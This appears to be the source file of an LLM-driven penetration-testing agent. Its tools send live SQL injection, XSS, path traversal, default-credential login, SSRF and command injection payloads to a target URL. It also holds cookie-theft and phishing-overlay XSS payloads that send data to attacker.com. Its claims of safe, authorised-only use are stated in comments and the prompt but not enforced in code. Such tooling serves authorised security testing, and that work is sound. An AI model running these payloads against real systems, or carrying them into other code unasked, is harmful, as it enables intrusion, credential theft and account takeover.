File size: 30,160 Bytes
792e3b9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
e940b67
792e3b9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
"""
agents/exploit_engine.py β€” Part 3: Exploitation Attempt Engine
Accepts Part 2 vuln dict and confirms vulnerabilities with safe PoC exploits.
Run standalone:  python -m agents.exploit_engine --vulns reports/vulns/vulns_*.json
Or via main.py:  python main.py --target example.com --parts 1,2,3
"""

import re
import json
import time
import socket
import argparse
import urllib.parse
from dataclasses import asdict
from typing import Optional

import requests
from bs4 import BeautifulSoup
from rich.panel import Panel
from rich.table import Table
from langchain_groq import ChatGroq
from langchain_openai import ChatOpenAI
from langchain.agents import AgentExecutor, create_tool_calling_agent
from langchain_core.prompts import ChatPromptTemplate
from langchain_core.tools import tool

from core.models import ExploitResult, ExploitSession, make_id
from core.utils  import console, safe_get, safe_post, save_json, save_markdown
from core.config import (GROQ_API_KEY, GROQ_MODEL_DEFAULT, GROQ_MODELS,
                          GEMINI_API_KEY, GEMINI_MODEL_DEFAULT,
                          EXPLOIT_DIR, MAX_EXPLOIT_ATTEMPTS, LLM_PROVIDER)

# ── Global state ─────────────────────────────────────────
session:  ExploitSession = None
DRY_RUN:  bool           = False


def _add(r: ExploitResult):
    session.add_result(r)
    color = {"CONFIRMED":"bold red","FAILED":"dim","SKIPPED":"yellow","ERROR":"orange3"}.get(r.status,"white")
    console.print(f"  [{color}]{r.status:10}[/{color}]  {r.vuln_category:15}  {r.vuln_title[:55]}")


# ══════════════════════════════════════════════════════════
#  MODULE 1 β€” SQLI DATA EXTRACTION
# ══════════════════════════════════════════════════════════

SQLI_EXTRACT = [
    ("MySQL version",    "' UNION SELECT version(),NULL,NULL--",          r"(\d+\.\d+\.\d+[^\s]*)"),
    ("MySQL db name",    "' UNION SELECT database(),NULL,NULL--",         r"([a-zA-Z0-9_]{3,30})"),
    ("MySQL tables",     "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database() LIMIT 5--", r"([a-z_]{3,20})"),
    ("PostgreSQL ver",   "' UNION SELECT version(),NULL,NULL--",          r"(PostgreSQL\s[\d.]+)"),
    ("MSSQL version",    "' UNION SELECT @@version,NULL,NULL--",          r"(Microsoft SQL Server\s[\d]+)"),
    ("DB error reveal",  "'",                                              r"(sql syntax|ORA-|pg_query|unclosed quotation)"),
]
DB_ERR = re.compile(r"(sql syntax|mysql_fetch|ORA-\d{5}|pg_query|unclosed quotation|"
                    r"Warning.*mysql|SQLSTATE|Microsoft OLE DB|Invalid query)", re.IGNORECASE)

@tool
def sqli_extract(url: str, vulnerable_param: str) -> str:
    """
    Confirm SQLi by extracting DB version and table names via safe UNION SELECT.
    Never modifies data β€” SELECT only.
    """
    console.print(f"\n[cyan]β†’ SQLi extract:[/cyan] {url}  param={vulnerable_param}")
    parsed = urllib.parse.urlparse(url)
    base   = urllib.parse.parse_qs(parsed.query)
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("sqli_dryrun",url), vuln_title="SQLi extract (dry run)",
            vuln_category="SQLi", target_url=url, status="SKIPPED",
            technique="UNION SELECT version(),database()", request_sent=f"[dry-run]",
            response_snippet="No request sent", impact="DB version, table names, potential full dump.",
            cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    for label, payload, pattern in SQLI_EXTRACT:
        p = dict(base); p[vulnerable_param] = [payload]
        test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True)))
        r = safe_get(test_url)
        if not r: continue
        err   = DB_ERR.search(r.text)
        match = re.search(pattern, r.text, re.IGNORECASE)
        if match or err:
            extracted = (match or err).group(1)
            _add(ExploitResult(exploit_id=make_id(label,url), vuln_title=f"SQLi confirmed: {label}",
                vuln_category="SQLi", target_url=test_url, status="CONFIRMED",
                technique=f"UNION SELECT in param '{vulnerable_param}'",
                request_sent=f"GET {test_url[:120]}",
                response_snippet=f"Extracted: {extracted[:100]}",
                impact="Full DB enumeration possible β€” tables, columns, row data, credentials.",
                cvss_score=9.8, severity="CRITICAL",
                evidence_type="data_leak" if match else "error_message",
                notes=f"Payload: {payload}"))
            return json.dumps({"confirmed":True, "label":label, "extracted":extracted}, indent=2)

    return json.dumps({"confirmed":False})


# ══════════════════════════════════════════════════════════
#  MODULE 2 β€” XSS POC
# ══════════════════════════════════════════════════════════

XSS_POC = [
    ('<script>alert("XSS-POC")</script>',      r'alert.*XSS-POC'),
    ('<img src=x onerror=alert("XSS-POC")>',   r'onerror=alert'),
    ('<svg onload=alert("XSS-POC")>',           r'onload=alert'),
]
ATTACK_SCENARIOS = {
    "cookie_theft":    '<script>new Image().src="https://attacker.com/?c="+document.cookie</script>',
    "session_hijack":  '<script>fetch("https://attacker.com/",{method:"POST",body:document.cookie})</script>',
    "phishing_overlay":'<script>document.body.innerHTML="<form action=https://attacker.com method=POST><input name=u><input type=password name=p><button>Login</button></form>"</script>',
}

@tool
def xss_exploit_poc(url: str, vulnerable_param: str, param_type: str = "query") -> str:
    """
    Build a working XSS PoC and document cookie theft / session hijack scenarios.
    Confirms reflection only β€” does NOT steal cookies.
    """
    console.print(f"\n[cyan]β†’ XSS PoC:[/cyan] {url}  param={vulnerable_param}")
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("xss_dryrun",url), vuln_title="XSS PoC (dry run)",
            vuln_category="XSS", target_url=url, status="SKIPPED",
            technique="Reflected XSS payload", request_sent="[dry-run]",
            response_snippet="No request sent",
            impact="Cookie theft, session hijack, phishing overlay, keylogging.",
            cvss_score=7.4, severity="HIGH", evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    parsed = urllib.parse.urlparse(url)
    base   = urllib.parse.parse_qs(parsed.query)

    for payload, pattern in XSS_POC:
        if param_type == "query":
            p = dict(base); p[vulnerable_param] = [payload]
            test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True)))
            r = safe_get(test_url)
        else:
            test_url = url
            r = safe_post(url, {vulnerable_param: payload})
        if not r: continue
        if payload in r.text and "&lt;script&gt;" not in r.text:
            _add(ExploitResult(exploit_id=make_id("xss_confirmed",url),
                vuln_title=f"XSS confirmed β€” {vulnerable_param}",
                vuln_category="XSS", target_url=test_url, status="CONFIRMED",
                technique=f"Reflected XSS via '{vulnerable_param}'",
                request_sent=f"GET {test_url[:120]}",
                response_snippet=f"Payload reflected: {payload[:80]}",
                impact="Cookie theft, session hijack, phishing overlay, keylogging.",
                cvss_score=7.4, severity="HIGH", evidence_type="reflection",
                notes=f"Attack scenarios: {list(ATTACK_SCENARIOS.keys())}"))
            return json.dumps({"confirmed":True, "payload":payload,
                               "attack_scenarios": ATTACK_SCENARIOS}, indent=2)

    _add(ExploitResult(exploit_id=make_id("xss_failed",url), vuln_title=f"XSS re-test β€” {vulnerable_param}",
        vuln_category="XSS", target_url=url, status="FAILED", technique="XSS PoC",
        request_sent=f"{len(XSS_POC)} payloads", response_snippet="No reflection",
        impact="Not confirmed", cvss_score=0.0, severity="INFO", evidence_type="none"))
    return json.dumps({"confirmed":False})


# ══════════════════════════════════════════════════════════
#  MODULE 3 β€” PATH TRAVERSAL / LFI
# ══════════════════════════════════════════════════════════

LFI_PAYLOADS = [
    ("../../../etc/passwd",             r"root:.*:/bin/(bash|sh)"),
    ("....//....//....//etc/passwd",    r"root:.*:/bin/(bash|sh)"),
    ("%2e%2e%2f%2e%2e%2fetc%2fpasswd",  r"root:.*:/bin/(bash|sh)"),
    # FIXED: Hostname files should contain actual hostnames, not generic patterns
    # Linux hostnames are typically lowercase alphanumeric with optional hyphens/dots
    ("../../../etc/hostname",           r"^[a-z][a-z0-9\-]{2,63}$"),
    ("../../../proc/version",           r"Linux version \d+"),
    ("..\\..\\..\\windows\\win.ini",    r"\[fonts\]"),
]

@tool
def path_traversal_probe(url: str, file_param: str = "file") -> str:
    """
    Test for LFI/path traversal β€” reads /etc/passwd and /etc/hostname only.
    Never reads sensitive app config.
    """
    console.print(f"\n[cyan]β†’ Path traversal:[/cyan] {url}  param={file_param}")
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("lfi_dryrun",url), vuln_title="LFI probe (dry run)",
            vuln_category="PathTraversal", target_url=url, status="SKIPPED",
            technique="Traversal sequences", request_sent="[dry-run]",
            response_snippet="No request sent",
            impact="Read any file accessible to web server process.",
            cvss_score=8.6, severity="HIGH", evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    parsed = urllib.parse.urlparse(url)
    base   = urllib.parse.parse_qs(parsed.query)

    for payload, pattern in LFI_PAYLOADS:
        p = dict(base); p[file_param] = [payload]
        test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True)))
        r = safe_get(test_url)
        if not r: continue
        match = re.search(pattern, r.text, re.IGNORECASE)
        if match:
            evidence = match.group(0)[:120]
            
            # CRITICAL FIX: Validate evidence is NOT from normal HTML responses
            # Reject if evidence looks like HTML/DOCTYPE/common web strings
            false_positive_indicators = [
                'doctype', '<!doctype', '<html', '<head', '<body', '<meta',
                '<script', '<style', '<div', '<span', 'charset=', 'content=',
                'http-equiv', 'viewport', 'stylesheet', 'javascript',
                # Common English words that aren't hostnames
                'the ', 'and ', 'for ', 'this ', 'that ', 'with ',
            ]
            
            is_false_positive = any(
                indicator.lower() in evidence.lower()
                for indicator in false_positive_indicators
            )
            
            # For hostname payloads, validate it looks like an actual hostname
            if 'hostname' in payload.lower():
                # Hostnames should be short, lowercase, no spaces/HTML
                hostname_valid = (
                    len(evidence) < 64 and
                    evidence.isalnum() or '-' in evidence and
                    not any(c.isupper() for c in evidence.replace('-', '')) and
                    ' ' not in evidence and
                    '<' not in evidence
                )
                if not hostname_valid:
                    is_false_positive = True
            
            if is_false_positive:
                console.print(f"  [dim]⊘ False positive filtered: {evidence[:60]}[/dim]")
                continue
            
            _add(ExploitResult(exploit_id=make_id("lfi_confirmed",url),
                vuln_title=f"Path traversal confirmed β€” reads {payload.split('/')[-1]}",
                vuln_category="PathTraversal", target_url=test_url, status="CONFIRMED",
                technique=f"Traversal in '{file_param}': {payload}",
                request_sent=f"GET {test_url[:140]}",
                response_snippet=evidence,
                impact="Read /etc/shadow, SSH keys, app config, DB credentials, source code.",
                cvss_score=8.6, severity="HIGH", evidence_type="data_leak",
                notes=f"Payload: {payload}"))
            return json.dumps({"confirmed":True, "payload":payload,
                               "evidence":evidence[:80]}, indent=2)

    return json.dumps({"confirmed":False})


# ══════════════════════════════════════════════════════════
#  MODULE 4 β€” AUTH BYPASS
# ══════════════════════════════════════════════════════════

DEFAULT_CREDS = [
    ("admin","admin"),("admin","password"),("admin","123456"),("admin",""),
    ("administrator","administrator"),("root","root"),("guest","guest"),("admin","changeme"),
]
SQL_BYPASS = [("' OR '1'='1'--","' OR '1'='1'--"),("' OR 1=1--","anything")]
ADMIN_PATHS = ["/admin/login","/admin","/wp-admin","/wp-login.php","/login",
               "/administrator","/cpanel","/phpmyadmin","/console"]

@tool
def auth_bypass_test(base_url: str, custom_login_path: str = "") -> str:
    """
    Test admin panels for default credentials and SQL auth bypass.
    Stops after first confirmed login β€” never creates accounts.
    """
    console.print(f"\n[cyan]β†’ Auth bypass:[/cyan] {base_url}")
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("auth_dryrun",base_url),
            vuln_title="Auth bypass (dry run)", vuln_category="AuthBypass",
            target_url=base_url, status="SKIPPED", technique="Default creds + SQL bypass",
            request_sent="[dry-run]", response_snippet="No request sent",
            impact="Full admin panel access.", cvss_score=9.8, severity="CRITICAL",
            evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    import urllib3; urllib3.disable_warnings()
    sess = requests.Session(); sess.verify = False
    sess.headers["User-Agent"] = "Mozilla/5.0"
    paths = [custom_login_path] if custom_login_path else ADMIN_PATHS

    for path in paths:
        login_url = base_url.rstrip("/") + path
        r = safe_get(login_url)
        if not r or r.status_code not in (200,301,302): continue
        soup = BeautifulSoup(r.text, "html.parser")
        form = soup.find("form")
        if not form: continue
        inputs     = {i.get("name",""): i.get("value","") for i in form.find_all("input") if i.get("name")}
        user_field = next((k for k in inputs if any(x in k.lower() for x in ["user","login","email"])), None)
        pass_field = next((k for k in inputs if any(x in k.lower() for x in ["pass","pwd"])), None)
        if not user_field or not pass_field: continue
        action   = form.get("action", path)
        post_url = base_url.rstrip("/")+action if not action.startswith("http") else action

        for username, password in DEFAULT_CREDS:
            data = dict(inputs); data[user_field]=username; data[pass_field]=password
            time.sleep(0.3)
            try:
                resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True)
                body = resp.text.lower()
                if (any(s in body for s in ["logout","dashboard","welcome","sign out"])
                        and not any(f in body for f in ["invalid","incorrect","failed"])):
                    _add(ExploitResult(exploit_id=make_id("auth_confirmed",login_url),
                        vuln_title=f"Default credentials: {username}:{password}",
                        vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED",
                        technique=f"Default cred: {username}/{'*'*len(password) or '(empty)'}",
                        request_sent=f"POST {post_url} [{user_field}={username}]",
                        response_snippet=resp.text[:200],
                        impact=f"Full admin access. Read/modify all data, possible RCE via file upload.",
                        cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success",
                        notes=f"Login path: {path}"))
                    return json.dumps({"confirmed":True,"credentials":{"user":username,"pass":password}})
            except Exception: pass

        for user_pl, pass_pl in SQL_BYPASS:
            data = dict(inputs); data[user_field]=user_pl; data[pass_field]=pass_pl
            time.sleep(0.3)
            try:
                resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True)
                body = resp.text.lower()
                if (any(s in body for s in ["logout","dashboard","welcome"])
                        and not any(f in body for f in ["invalid","incorrect"])):
                    _add(ExploitResult(exploit_id=make_id("sql_auth_bypass",login_url),
                        vuln_title="SQL auth bypass confirmed",
                        vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED",
                        technique=f"SQL injection in login: {user_pl}",
                        request_sent=f"POST {post_url}",
                        response_snippet=resp.text[:200],
                        impact="Auth bypassed via SQLi. Full admin access.",
                        cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success"))
                    return json.dumps({"confirmed":True,"technique":"sql_auth_bypass"})
            except Exception: pass

    return json.dumps({"confirmed":False})


# ══════════════════════════════════════════════════════════
#  MODULE 5 β€” SSRF PROBE
# ══════════════════════════════════════════════════════════

SSRF_PARAMS = ["url","redirect","next","image","src","load","fetch","request","uri","resource","link"]
CLOUD_META   = ["http://169.254.169.254/latest/meta-data/",
                 "http://metadata.google.internal/computeMetadata/v1/"]

@tool
def ssrf_probe(base_url: str, known_params: str = "") -> str:
    """Detect SSRF β€” makes server fetch external/cloud-metadata URLs."""
    console.print(f"\n[cyan]β†’ SSRF probe:[/cyan] {base_url}")
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("ssrf_dryrun",base_url),
            vuln_title="SSRF probe (dry run)", vuln_category="SSRF",
            target_url=base_url, status="SKIPPED",
            technique="URL injection in query params", request_sent="[dry-run]",
            response_snippet="No request sent",
            impact="Internal network access, cloud credential leak.",
            cvss_score=8.3, severity="HIGH", evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    params = known_params.split(",") if known_params else SSRF_PARAMS
    for param in params[:8]:
        for callback in CLOUD_META:
            test_url = f"{base_url}{'&' if '?' in base_url else '?'}{param}={urllib.parse.quote(callback)}"
            r = safe_get(test_url, timeout=6)
            if not r: continue
            if re.search(r"(ami-id|instance-id|iam/security-credentials|computeMetadata)", r.text, re.I):
                _add(ExploitResult(exploit_id=make_id("ssrf_confirmed",base_url),
                    vuln_title=f"SSRF β€” cloud metadata via '{param}'",
                    vuln_category="SSRF", target_url=test_url, status="CONFIRMED",
                    technique=f"SSRF via '{param}' β†’ {callback}",
                    request_sent=f"GET {test_url[:140]}",
                    response_snippet=r.text[:200],
                    impact="IAM credentials, instance metadata, internal service tokens exposed.",
                    cvss_score=8.3, severity="HIGH", evidence_type="data_leak",
                    notes="Cloud metadata pattern found"))
                return json.dumps({"confirmed":True,"param":param,"callback":callback})

    return json.dumps({"confirmed":False, "params_tested": params[:8]})


# ══════════════════════════════════════════════════════════
#  MODULE 6 β€” COMMAND INJECTION
# ══════════════════════════════════════════════════════════

CMDI_PAYLOADS = [
    ("; whoami",   r"(root|www-data|apache|nginx|nobody|daemon)"),
    ("| whoami",   r"(root|www-data|apache|nginx|nobody|daemon)"),
    ("$(whoami)",  r"(root|www-data|apache|nginx|nobody|daemon)"),
    ("; id",       r"uid=\d+"),
    ("; hostname", r"[a-zA-Z0-9\-]{3,50}"),
    ("; sleep 3",  None),
    ("& whoami",   r"[a-zA-Z0-9\\]+(\\[a-zA-Z0-9]+)?"),
]

@tool
def cmdi_probe(url: str, vulnerable_param: Optional[str] = None) -> str:
    """
    Detect OS command injection via output reflection or timing.
    Only tests safe read-only commands: whoami, id, hostname, sleep.
    """
    console.print(f"\n[cyan]β†’ Cmd injection:[/cyan] {url}")
    if DRY_RUN:
        _add(ExploitResult(exploit_id=make_id("cmdi_dryrun",url),
            vuln_title="Cmd injection probe (dry run)", vuln_category="CmdInjection",
            target_url=url, status="SKIPPED", technique="; whoami / sleep timing",
            request_sent="[dry-run]", response_snippet="No request sent",
            impact="Remote code execution as web server user.",
            cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run"))
        return json.dumps({"status":"dry_run"})

    parsed = urllib.parse.urlparse(url)
    query  = urllib.parse.parse_qs(parsed.query)
    params = [vulnerable_param] if vulnerable_param else list(query.keys())[:5]

    for param in params:
        for payload, pattern in CMDI_PAYLOADS:
            p = dict(query); p[param] = [(p.get(param,["1"])[0]) + payload]
            test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True)))
            start = time.time()
            r = safe_get(test_url)
            elapsed = time.time() - start
            if not r: continue
            if pattern:
                match = re.search(pattern, r.text)
                if match:
                    _add(ExploitResult(exploit_id=make_id("cmdi_confirmed",url),
                        vuln_title=f"Cmd injection β€” {param} (output-based)",
                        vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED",
                        technique=f"Injected `{payload}` into '{param}'",
                        request_sent=f"GET {test_url[:140]}",
                        response_snippet=f"Output: {match.group(0)[:80]}",
                        impact=f"RCE as {match.group(0)}. File read, reverse shell, pivot possible.",
                        cvss_score=9.8, severity="CRITICAL", evidence_type="data_leak",
                        notes=f"Server user: {match.group(0)}"))
                    return json.dumps({"confirmed":True,"type":"output","server_user":match.group(0)})
            if "sleep" in payload and elapsed >= 2.5:
                _add(ExploitResult(exploit_id=make_id("cmdi_timebased",url),
                    vuln_title=f"Cmd injection β€” {param} (time-based)",
                    vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED",
                    technique=f"Time-based: `{payload}` in '{param}'",
                    request_sent=f"GET {test_url[:140]}",
                    response_snippet=f"Delay: {elapsed:.2f}s",
                    impact="Blind RCE. Out-of-band exfil, reverse shell, persistence.",
                    cvss_score=9.8, severity="CRITICAL", evidence_type="delay",
                    notes=f"Delay: {elapsed:.2f}s"))
                return json.dumps({"confirmed":True,"type":"time_based","delay":round(elapsed,2)})

    return json.dumps({"confirmed":False})


# ══════════════════════════════════════════════════════════
#  AGENT
# ══════════════════════════════════════════════════════════

SYSTEM_PROMPT = """You are an expert penetration tester in the exploitation phase.

⚠️  Authorized targets only. Confirm vulns β€” never destroy data or install backdoors.

RULES:
- Run sqli_extract for each confirmed SQLi finding
- Run xss_exploit_poc for each confirmed XSS finding
- Run auth_bypass_test if admin paths found
- Run ssrf_probe if URL/redirect params exist
- Run cmdi_probe if OS command injection is suspected
- Max {max_attempts} exploit attempts total
- Explain your reasoning before each tool call
""".format(max_attempts=MAX_EXPLOIT_ATTEMPTS)


def build_agent(llm: ChatGroq) -> AgentExecutor:
    tools  = [sqli_extract, xss_exploit_poc, path_traversal_probe,
              auth_bypass_test, ssrf_probe, cmdi_probe]
    prompt = ChatPromptTemplate.from_messages([
        ("system", SYSTEM_PROMPT),
        ("human", "{input}"),
        ("placeholder", "{agent_scratchpad}"),
    ])
    agent = create_tool_calling_agent(llm, tools, prompt)
    return AgentExecutor(agent=agent, tools=tools, verbose=True, max_iterations=15)


def build_task(target: str, vulns: list, severity_filter: list, dry_run: bool) -> str:
    filtered = sorted(
        [v for v in vulns if v.get("severity","INFO") in severity_filter],
        key=lambda x: -x.get("cvss_score",0)
    )[:20]
    return (
        f"Target: {target}\n"
        f"Dry-run: {dry_run}\n\n"
        f"Vulnerability findings from Part 2:\n"
        f"{json.dumps(filtered, indent=2)}\n\n"
        "Prioritise by CVSS score. Explain each exploit attempt before running it."
    )


def run(vuln_data: dict, model: str = GROQ_MODEL_DEFAULT,
        severity_filter: list = None, dry_run: bool = False) -> dict:
    """
    Entry point called by main.py.
    Accepts Part 2 vuln dict, returns exploit session dict.
    """
    global session, DRY_RUN
    DRY_RUN = dry_run
    if severity_filter is None:
        severity_filter = ["CRITICAL", "HIGH"]

    target  = vuln_data.get("target", "unknown")
    vulns   = vuln_data.get("vulnerabilities", [])
    session = ExploitSession(target=target, dry_run=dry_run)

    # Initialize LLM based on configured provider
    if LLM_PROVIDER == "gemini":
        llm = ChatOpenAI(
            api_key=GEMINI_API_KEY or "dummy_key",
            base_url="https://generativelanguage.googleapis.com/v1beta/openai/",
            model=GEMINI_MODEL_DEFAULT,
            temperature=0
        )
        console.print(f"[dim]Using LLM: Gemini ({GEMINI_MODEL_DEFAULT}) - Fallback mode (OpenAI-mode)[/dim]")
    else:
        llm = ChatGroq(model=model, api_key=GROQ_API_KEY,
                       temperature=0, max_tokens=4096)
        console.print(f"[dim]Using LLM: Groq ({model})[/dim]")

    console.print(f"\n[bold]Part 3 β€” Exploit engine:[/bold] {target}  dry_run={dry_run}")
    build_agent(llm).invoke({"input": build_task(target, vulns, severity_filter, dry_run)})

    session.session_end = __import__("datetime").datetime.utcnow().isoformat()
    result_dict = {
        "target":           target,
        "session_start":    session.session_start,
        "session_end":      session.session_end,
        "dry_run":          dry_run,
        "summary":          session.summary(),
        "confirmed_count":  len(session.confirmed()),
        "results":          [asdict(r) for r in session.results],
    }

    json_path = save_json(result_dict, EXPLOIT_DIR, "exploits", target)
    console.print(f"[green]βœ“[/green] Exploit JSON: {json_path}")

    confirmed = session.confirmed()
    if confirmed:
        console.print(f"\n[bold red]{len(confirmed)} vulnerability/vulnerabilities confirmed exploitable:[/bold red]")
        for r in confirmed:
            console.print(f"  [red]β€’[/red] {r.vuln_title}")

    return result_dict


# ══════════════════════════════════════════════════════════
#  STANDALONE ENTRY
# ══════════════════════════════════════════════════════════

if __name__ == "__main__":
    from core.utils import load_json
    parser = argparse.ArgumentParser(description="Part 3 β€” Exploit engine")
    parser.add_argument("--vulns",    required=True, help="Part 2 vuln JSON")
    parser.add_argument("--model",    default=GROQ_MODEL_DEFAULT, choices=list(GROQ_MODELS.keys()))
    parser.add_argument("--severity", default="CRITICAL,HIGH")
    parser.add_argument("--dry-run",  action="store_true")
    parser.add_argument("--delay",    type=float, default=0.3)
    args = parser.parse_args()
    from core.utils import set_delay
    set_delay(args.delay)
    run(load_json(args.vulns), args.model,
        [s.strip().upper() for s in args.severity.split(",")], args.dry_run)